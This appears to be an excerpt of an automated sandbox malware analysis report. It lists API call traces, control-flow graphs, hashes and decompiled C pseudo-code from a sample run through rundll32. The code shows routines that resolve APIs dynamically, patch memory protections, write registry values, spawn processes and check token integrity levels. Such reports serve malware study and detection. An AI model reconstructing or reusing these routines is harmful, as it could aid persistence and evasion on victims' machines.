                            control_flow_graph 401 4f73959-4f73991 call 4f7bad1 404 4f739f5-4f73a0a WaitForSingleObject 401->404 405 4f73993 401->405 406 4f73af4-4f73b2d RtlExitUserThread 404->406 407 4f73a10-4f73a1e 404->407 408 4f73996-4f739ab call 4f7a651 405->408 409 4f73b40-4f73b67 CreateProcessA 406->409 410 4f73b2f-4f73b3b 406->410 411 4f73a24-4f73a45 RegOpenKeyA 407->411 412 4f73ab0-4f73ac3 call 4f73829 407->412 421 4f739ad-4f739c4 408->421 422 4f739dc-4f739f3 call 4f7e803 408->422 418 4f73b74-4f73b76 409->418 419 4f73b69-4f73b6f call 4f75d7a 409->419 410->409 433 4f73b3d 410->433 416 4f73a47-4f73a69 RegSetValueExA RegCloseKey 411->416 417 4f73a6f-4f73a72 411->417 412->406 431 4f73ac5-4f73ad4 WaitForSingleObject 412->431 416->417 427 4f73a74-4f73a77 417->427 428 4f73a79-4f73aad call 4f7e778 417->428 423 4f73b7e-4f73b8c 418->423 424 4f73b78-4f73b79 call 4f7e803 418->424 419->418 421->422 438 4f739c6-4f739d7 call 4f6f39b 421->438 422->404 422->408 424->423 427->412 427->428 428->412 431->406 436 4f73ad6-4f73af1 call 4f7d30a 431->436 433->409 436->406 438->422
                            APIs
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 04F7BB1D
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 04F7BB29
                              • Part of subcall function 04F7BAD1: memset.NTDLL ref: 04F7BB71
                              • Part of subcall function 04F7BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04F7BB8C
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(0000002C), ref: 04F7BBC4
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(?), ref: 04F7BBCC
                              • Part of subcall function 04F7BAD1: memset.NTDLL ref: 04F7BBEF
                              • Part of subcall function 04F7BAD1: wcscpy.NTDLL ref: 04F7BC01
                            • WaitForSingleObject.KERNEL32(00000000,?,06319998,?,00000000,00000000,00000001), ref: 04F73A03
                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04F73A3D
                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000000,00000004), ref: 04F73A60
                            • RegCloseKey.ADVAPI32(?), ref: 04F73A69
                            • WaitForSingleObject.KERNEL32(00000000), ref: 04F73ACD
                            • RtlExitUserThread.NTDLL(?), ref: 04F73B03
                              • Part of subcall function 04F7A651: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,761B6920,00000000,?,?,?,04F6148A,?,?,?), ref: 04F7A66F
                              • Part of subcall function 04F7A651: GetFileSize.KERNEL32(00000000,00000000,?,?,04F6148A,?,?,?), ref: 04F7A67F
                              • Part of subcall function 04F7A651: CloseHandle.KERNEL32(000000FF,?,?,04F6148A,?,?,?), ref: 04F7A6E1
                            • CreateProcessA.KERNEL32(?,?,?,7620F750,?,?,?,?,?,?,?,?,7620F750), ref: 04F73B5C
                              • Part of subcall function 04F6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 04F6F3DB
                              • Part of subcall function 04F6F39B: GetLastError.KERNEL32 ref: 04F6F3E5
                              • Part of subcall function 04F6F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 04F6F40A
                              • Part of subcall function 04F6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 04F6F42D
                              • Part of subcall function 04F6F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 04F6F455
                              • Part of subcall function 04F6F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 04F6F46A
                              • Part of subcall function 04F6F39B: SetEndOfFile.KERNEL32(00001000), ref: 04F6F477
                              • Part of subcall function 04F6F39B: CloseHandle.KERNEL32(00001000), ref: 04F6F48F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Createlstrlen$CloseObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerProcessSizeThreadUserValueWritewcscpy
                            • String ID:
                            • API String ID: 3876914104-0
                            • Opcode ID: fc23340dcc3f7968fcadfbe79058e61d5e504fc5337c0229384915fb3be08a9f
                            • Instruction ID: 3e0084625ae96788c0b5c6498db90e63181a349a77240ffc2dd34151bc8cdb8c
                            • Opcode Fuzzy Hash: fc23340dcc3f7968fcadfbe79058e61d5e504fc5337c0229384915fb3be08a9f
                            • Instruction Fuzzy Hash: 6C612F71A00209BFEB11DF95EC85EAE77B9EB08314F01406AF915AB250D778E952DF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F68C35 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 04F633A5: VirtualProtect.KERNEL32(?,?,00000040,?,?,?,00000000), ref: 04F633CA
                              • Part of subcall function 04F633A5: GetLastError.KERNEL32(?,00000000), ref: 04F633D2
                              • Part of subcall function 04F633A5: VirtualQuery.KERNEL32(?,?,0000001C,?,00000000), ref: 04F633E9
                              • Part of subcall function 04F633A5: VirtualProtect.KERNEL32(?,?,-2C9B417C,?,?,00000000), ref: 04F6340E
                            • GetLastError.KERNEL32(00000000,00000004,?,?,80000000,00000000,00000001,04F860B0,0000001C,04F7BE61,00000002,?,00000001,80000000,04F89A20,80000000), ref: 04F68D90
                              • Part of subcall function 04F6A253: lstrlen.KERNEL32(?,?), ref: 04F6A28B
                              • Part of subcall function 04F6A253: lstrcpy.KERNEL32(00000000,?), ref: 04F6A2A2
                              • Part of subcall function 04F6A253: StrChrA.SHLWAPI(00000000,0000002E), ref: 04F6A2AB
                              • Part of subcall function 04F6A253: GetModuleHandleA.KERNEL32(00000000), ref: 04F6A2C9
                            • VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,?,?,?,?,?,00000000,00000004,?,?,80000000), ref: 04F68D0D
                            • VirtualProtect.KERNEL32(?,00000004,?,?,?,?,00000000,00000004,?,?,80000000,00000000,00000001,04F860B0,0000001C,04F7BE61), ref: 04F68D28
                            • RtlEnterCriticalSection.NTDLL(04F8A400), ref: 04F68D4D
                            • RtlLeaveCriticalSection.NTDLL(04F8A400), ref: 04F68D6B
                              • Part of subcall function 04F633A5: SetLastError.KERNEL32(80000000,?,00000000), ref: 04F63417
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                            • String ID:
                            • API String ID: 899430048-3916222277
                            • Opcode ID: 3316763a39d662a6b5c953a551e8a547cb3c15629d300b9e29e77764a8bae4e0
                            • Instruction ID: fb41d85201220f699af65c94ad9988defc9ee2445773eecddd8a8ebdfef9caaf
                            • Opcode Fuzzy Hash: 3316763a39d662a6b5c953a551e8a547cb3c15629d300b9e29e77764a8bae4e0
                            • Instruction Fuzzy Hash: 5E415D7190161AEFDB10EF68D848AAEBBF4FF08354F14811DE916AB250D774E952CFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F755E4 Relevance: 10.6, APIs: 7, Instructions: 110memorystringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 511 4f755e4-4f75623 call 4f761ae VirtualAlloc 514 4f756f4 511->514 515 4f75629-4f75634 call 4f761ae 511->515 517 4f756fc-4f756fe 514->517 518 4f75639-4f7563f 515->518 519 4f75700-4f75708 VirtualFree 517->519 520 4f7570e-4f75719 517->520 521 4f75667-4f75669 518->521 522 4f75641-4f75645 518->522 519->520 521->514 524 4f7566f-4f75673 521->524 522->521 523 4f75647-4f75665 VirtualFree VirtualAlloc 522->523 523->515 523->521 524->514 525 4f75675-4f75680 524->525 525->517 526 4f75682 525->526 527 4f75688-4f75695 526->527 528 4f75697-4f756a0 lstrcmpi 527->528 529 4f756d1-4f756eb 527->529 528->529 531 4f756a2-4f756ad StrChrA 528->531 529->517 530 4f756ed-4f756f2 529->530 530->517 532 4f756af-4f756bb lstrcmpi 531->532 533 4f756bd-4f756cd 531->533 532->529 532->533 533->527 534 4f756cf 533->534 534->517
                            APIs
                              • Part of subcall function 04F761AE: GetProcAddress.KERNEL32(?,00000318), ref: 04F761D3
                              • Part of subcall function 04F761AE: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 04F761EF
                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04F7561D
                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04F75708
                              • Part of subcall function 04F761AE: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 04F76359
                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 04F75653
                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04F7565F
                            • lstrcmpi.KERNEL32(?,00000000), ref: 04F7569C
                            • StrChrA.SHLWAPI(?,0000002E), ref: 04F756A5
                            • lstrcmpi.KERNEL32(?,00000000), ref: 04F756B7
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                            • String ID:
                            • API String ID: 3901270786-0
                            • Opcode ID: 881bc17c41d38658b4f5e162945e4242a6e5180cec1b8cf814b2b10d136a14dc
                            • Instruction ID: 7b78d7eb7d29f6fedc66d885043d7143768370e64e2c336e55ae3ce85987d272
                            • Opcode Fuzzy Hash: 881bc17c41d38658b4f5e162945e4242a6e5180cec1b8cf814b2b10d136a14dc
                            • Instruction Fuzzy Hash: 0A316371904315BBE7218F11DC84F2BBBE8FF84B94F10191AF984A7680D778E905CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A1402A Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 73%
                            			E04A1402A(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E04A144DE(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E04A17A1E( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x4a1a300 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x4a1a348; // 0xb1d5a8
					_t18 = _t47 + 0x4a1b3f3; // 0x73797325
					_t68 = E04A17326(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x4a1a348; // 0xb1d5a8
						_t19 = _t50 + 0x4a1b73f; // 0x5538ce7
						_t20 = _t50 + 0x4a1b0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E04A123AA();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
							_push(1);
							E04A123AA();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								FindCloseChangeNotification(_v28); // executed
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x4a1a2d8, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E04A16C2C(_t70);
				goto L12;
			}


















                            0x04a14032
                            0x04a14032
                            0x04a14041
                            0x04a14048
                            0x04a1404d
                            0x04a1415a
                            0x04a14161
                            0x04a14161
                            0x04a1405c
                            0x04a14064
                            0x04a14067
                            0x04a1406c
                            0x04a14081
                            0x04a14087
                            0x04a14088
                            0x04a1408b
                            0x04a14091
                            0x04a14094
                            0x04a14099
                            0x04a140a1
                            0x04a140ad
                            0x04a140b1
                            0x04a14141
                            0x04a140b7
                            0x04a140b7
                            0x04a140bc
                            0x04a140c3
                            0x04a140d7
                            0x04a140db
                            0x04a1412a
                            0x04a140dd
                            0x04a140de
                            0x04a140e5
                            0x04a140fe
                            0x04a14100
                            0x04a14104
                            0x04a1410b
                            0x04a14125
                            0x04a1410d
                            0x04a14116
                            0x04a1411b
                            0x04a1411b
                            0x04a1410b
                            0x04a14139
                            0x04a14139
                            0x04a140b1
                            0x04a14148
                            0x04a14151
                            0x04a14155
                            0x00000000

                            APIs
                              • Part of subcall function 04A144DE: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04A14046,?,?,?,?,00000000,00000000), ref: 04A14503
                              • Part of subcall function 04A144DE: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04A14525
                              • Part of subcall function 04A144DE: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04A1453B
                              • Part of subcall function 04A144DE: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04A14551
                              • Part of subcall function 04A144DE: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04A14567
                              • Part of subcall function 04A144DE: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04A1457D
                            • memset.NTDLL ref: 04A14094
                              • Part of subcall function 04A17326: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04A140AD,73797325), ref: 04A17337
                              • Part of subcall function 04A17326: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04A17351
                            • GetModuleHandleA.KERNEL32(4E52454B,05538CE7,73797325), ref: 04A140CA
                            • GetProcAddress.KERNEL32(00000000), ref: 04A140D1
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04A14139
                              • Part of subcall function 04A123AA: GetProcAddress.KERNEL32(36776F57,04A17989), ref: 04A123C5
                            • FindCloseChangeNotification.KERNEL32(00000000,00000001), ref: 04A14116
                            • CloseHandle.KERNEL32(?), ref: 04A1411B
                            • GetLastError.KERNEL32(00000001), ref: 04A1411F
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ChangeErrorFindFreeHeapLastNotificationmemset
                            • String ID:
                            • API String ID: 186216982-0
                            • Opcode ID: 6e69bc7c7c4c00a7eda8cacf254eef46a411656d93c4720f757c975e36875e6f
                            • Instruction ID: efcb12f59ea0ce528bad049a8117e38d2459386bf5f5510220ba988018151dac
                            • Opcode Fuzzy Hash: 6e69bc7c7c4c00a7eda8cacf254eef46a411656d93c4720f757c975e36875e6f
                            • Instruction Fuzzy Hash: F63160B6901218AFEB10AFA4DD88EDEBBBCEB18354F144465EA05E7130D734AE45CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F612E7 Relevance: 10.6, APIs: 7, Instructions: 84sleepthreadCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F673EB: memset.NTDLL ref: 04F673F5
                            • OpenEventA.KERNEL32(00000002,00000000,00000000,00000000,?,04F6E2A4,?,?,?,?,?,?,?,04F69100,?), ref: 04F61381
                            • SetEvent.KERNEL32(00000000,?,04F6E2A4,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F6138E
                            • Sleep.KERNEL32(00000BB8,?,04F6E2A4,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F61399
                            • ResetEvent.KERNEL32(00000000,?,04F6E2A4,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F613A0
                            • CloseHandle.KERNEL32(00000000,?,04F6E2A4,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F613A7
                            • GetShellWindow.USER32 ref: 04F613B2
                            • GetWindowThreadProcessId.USER32(00000000), ref: 04F613B9
                              • Part of subcall function 04F7B1DC: RegCloseKey.ADVAPI32(04F6E2A4), ref: 04F7B25F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                            • String ID:
                            • API String ID: 53838381-0
                            • Opcode ID: 4bb2f24d184eff3874fb32451054e395f8faa7f573262a3131947405fa46b189
                            • Instruction ID: 0c98b4e2bd8ac0a7832f7865ad2952d348bfbfba8faed70847e84989ec61fb4b
                            • Opcode Fuzzy Hash: 4bb2f24d184eff3874fb32451054e395f8faa7f573262a3131947405fa46b189
                            • Instruction Fuzzy Hash: C621B632B00218BFD2206A69BC49E3F77A9EBCA714B14410EF6079F100DB797C02CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A16C41 Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A16C41(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x4a1a2fc > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E04A16D63(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E04A16C2C(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                            0x04a16c4e
                            0x04a16c55
                            0x04a16c5c
                            0x04a16c70
                            0x04a16c7b
                            0x04a16c93
                            0x04a16ca0
                            0x04a16ca3
                            0x04a16ca8
                            0x04a16cb3
                            0x04a16cb7
                            0x04a16cc6
                            0x04a16cca
                            0x04a16ce6
                            0x04a16ce6
                            0x04a16cea
                            0x04a16cea
                            0x04a16cef
                            0x04a16cf3
                            0x04a16cf9
                            0x04a16cfa
                            0x04a16d01
                            0x04a16d07

                            APIs
                            • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04A16C73
                            • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04A16C93
                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04A16CA3
                            • CloseHandle.KERNEL32(00000000), ref: 04A16CF3
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04A16CC6
                            • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04A16CCE
                            • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04A16CDE
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                            • String ID:
                            • API String ID: 1295030180-0
                            • Opcode ID: 1c2f208ba2e40b534bf10f7303ea58f9c20c10831e94192aef7f0c461eaded4f
                            • Instruction ID: f99c79a67eee7f478236022ed585bdec650c6746dc78244c7d16f87c98d9d569
                            • Opcode Fuzzy Hash: 1c2f208ba2e40b534bf10f7303ea58f9c20c10831e94192aef7f0c461eaded4f
                            • Instruction Fuzzy Hash: 80213975900249FFEB11DF94DD84EEEBBB9EB08304F0000A5E910A6160D7759E45DF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A11D33 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 64%
                            			E04A11D33(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x4a1a348; // 0xb1d5a8
				_t1 = _t9 + 0x4a1b624; // 0x253d7325
				_t36 = 0;
				_t28 = E04A1624E(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x55395b1
					_t40 = E04A16D63(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E04A124B3(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E04A16C2C(_t40);
						_t42 = E04A15A07(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E04A16C2C(_t36);
							_t36 = _t42;
						}
						_t43 = E04A14162(_t36, _t33);
						if(_t43 != 0) {
							E04A16C2C(_t36);
							_t36 = _t43;
						}
					}
					E04A16C2C(_t28);
				}
				return _t36;
			}
















                            0x04a11d33
                            0x04a11d36
                            0x04a11d37
                            0x04a11d3e
                            0x04a11d45
                            0x04a11d4c
                            0x04a11d50
                            0x04a11d57
                            0x04a11d5e
                            0x04a11d63
                            0x04a11d6b
                            0x04a11d75
                            0x04a11d79
                            0x04a11d7d
                            0x04a11d83
                            0x04a11d88
                            0x04a11d92
                            0x04a11d98
                            0x04a11d9a
                            0x04a11db1
                            0x04a11db5
                            0x04a11db8
                            0x04a11dbd
                            0x04a11dbd
                            0x04a11dc6
                            0x04a11dca
                            0x04a11dcd
                            0x04a11dd2
                            0x04a11dd2
                            0x04a11dca
                            0x04a11dd5
                            0x04a11dda
                            0x04a11de0

                            APIs
                              • Part of subcall function 04A1624E: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04A11D4C,253D7325,00000000,00000000,?,746BC740,04A158D7), ref: 04A162B5
                              • Part of subcall function 04A1624E: sprintf.NTDLL ref: 04A162D6
                            • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,746BC740,04A158D7,00000000,055395B0), ref: 04A11D5E
                            • lstrlen.KERNEL32(00000000,?,746BC740,04A158D7,00000000,055395B0), ref: 04A11D66
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • strcpy.NTDLL ref: 04A11D7D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 04A11D88
                              • Part of subcall function 04A124B3: lstrlen.KERNEL32(00000000,00000000,04A158D7,00000000,?,04A11D97,00000000,04A158D7,?,746BC740,04A158D7,00000000,055395B0), ref: 04A124C4
                              • Part of subcall function 04A16C2C: RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38
                            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,04A158D7,?,746BC740,04A158D7,00000000,055395B0), ref: 04A11DA5
                              • Part of subcall function 04A15A07: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,04A11DB1,00000000,?,746BC740,04A158D7,00000000,055395B0), ref: 04A15A11
                              • Part of subcall function 04A15A07: _snprintf.NTDLL ref: 04A15A6F
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                            • String ID: =
                            • API String ID: 2864389247-1428090586
                            • Opcode ID: 64b529a017048d7b0570e095ffd741adb0eb57bfe259460c1a5a3dab9e95235c
                            • Instruction ID: b67413728b2763d02693a3f98f9a0612c70d6394e1f3ade52a584c410a4e1bd2
                            • Opcode Fuzzy Hash: 64b529a017048d7b0570e095ffd741adb0eb57bfe259460c1a5a3dab9e95235c
                            • Instruction Fuzzy Hash: BA11C677901124776B127BB49E84CEF3AADDF996587050415FE00D7120CE79FD02C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A13F07 Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04A11F7A: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,055389D0,04A13F35,?,?,?,?,?,?,?,?,?,?,?,04A13F35), ref: 04A12047
                              • Part of subcall function 04A15634: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 04A15671
                              • Part of subcall function 04A15634: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 04A156A2
                            • SysAllocString.OLEAUT32(00000000), ref: 04A13F61
                            • SysAllocString.OLEAUT32(0070006F), ref: 04A13F75
                            • SysAllocString.OLEAUT32(00000000), ref: 04A13F87
                            • SysFreeString.OLEAUT32(00000000), ref: 04A13FEF
                            • SysFreeString.OLEAUT32(00000000), ref: 04A13FFE
                            • SysFreeString.OLEAUT32(00000000), ref: 04A14009
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                            • String ID:
                            • API String ID: 2831207796-0
                            • Opcode ID: 0f57f2bf6824a8a8a4d1c4953b234fb64d0aab89cc7a5c14241f244406bfdc87
                            • Instruction ID: 99572f695af237b990bccf25bb9235251a1bf055762a16cf82be8b59cc2a87d5
                            • Opcode Fuzzy Hash: 0f57f2bf6824a8a8a4d1c4953b234fb64d0aab89cc7a5c14241f244406bfdc87
                            • Instruction Fuzzy Hash: A3414C36D00609AFEB01DFACD844A9EB7B9EF49311F144426ED14EB260DA75A906CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

